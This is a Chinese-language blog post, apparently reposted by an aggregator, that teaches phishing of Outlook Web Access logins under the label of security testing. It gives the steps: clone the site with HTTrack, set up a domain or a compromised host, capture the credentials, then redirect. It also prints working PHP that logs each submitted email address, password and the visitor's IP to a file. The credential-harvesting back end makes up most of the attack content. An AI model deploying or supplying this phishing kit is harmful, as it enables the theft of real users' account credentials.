浅谈微软认证Outlook Web Access钓鱼(Outlook Web Access Phishing)
生活随笔
收集整理的這篇文章主要介紹了
浅谈微软认证Outlook Web Access钓鱼(Outlook Web Access Phishing)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
安全人員在進行安全測試的時候,會對一個企業進行整體評估,當然測試的項目很多,需要歷時數日再可見到效果,其中一項很重要的環節就是釣魚,很多測試人員只是知道有這個名詞,卻不會去用這項技能,很遺憾的一件事情,那么這次我們就講解一下如何一步一步的進行釣魚活動。
環境可以是你抓到的肉雞或者申請域名指向空間。
技術手段就是如下幾步:1、用工具HTTrack Website Copier 克隆一個網站。2、注冊或者申請域名,帶SSL最好,不帶也可3、修改克隆的網站代碼,獲取帳號密碼等敏感信息的代碼編寫4、跳轉到原始頁面或者提示信息即可
實例:
地址http://111.73.46.12:8011/
簡單前端代碼代碼如下:
后端接受代碼:
<?php@error_reporting(0);$email_name=$_POST["d"]; $email_pwd=$_POST["e"]; $email_pwd1=$_POST["f"]; $url="CookieAuth70fb.html";function GetIp(){$realip = '';$unknown = 'unknown';if (isset($_SERVER)){if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && !empty($_SERVER['HTTP_X_FORWARDED_FOR']) && strcasecmp($_SERVER['HTTP_X_FORWARDED_FOR'], $unknown)){$arr = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);foreach($arr as $ip){$ip = trim($ip);if ($ip != 'unknown'){$realip = $ip;break;}}}else if(isset($_SERVER['HTTP_CLIENT_IP']) && !empty($_SERVER['HTTP_CLIENT_IP']) && strcasecmp($_SERVER['HTTP_CLIENT_IP'], $unknown)){$realip = $_SERVER['HTTP_CLIENT_IP'];}else if(isset($_SERVER['REMOTE_ADDR']) && !empty($_SERVER['REMOTE_ADDR']) && strcasecmp($_SERVER['REMOTE_ADDR'], $unknown)){$realip = $_SERVER['REMOTE_ADDR'];}else{$realip = $unknown;}}else{if(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), $unknown)){$realip = getenv("HTTP_X_FORWARDED_FOR");}else if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), $unknown)){$realip = getenv("HTTP_CLIENT_IP");}else if(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), $unknown)){$realip = getenv("REMOTE_ADDR");}else{$realip = $unknown;}}$realip = preg_match("/[\d\.]{7,15}/", $realip, $matches) ? $matches[0] : $unknown;return $realip; } $gip=GetIp(); @file_put_contents("test.txt", "$email_name $email_pwd $email_pwd1 $gip\r\n", FILE_APPEND);Header("HTTP/1.1 303 See Other"); Header("Location: $url");?>案例到此結束,希望安全人員在進行測試的時候可以提交自身的評估水平,不能眼高手低。
總結
以上是生活随笔為你收集整理的浅谈微软认证Outlook Web Access钓鱼(Outlook Web Access Phishing)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: java dbms_用Java实现一个简
- 下一篇: 联想服务器接显示器一直黑屏,终于发现联想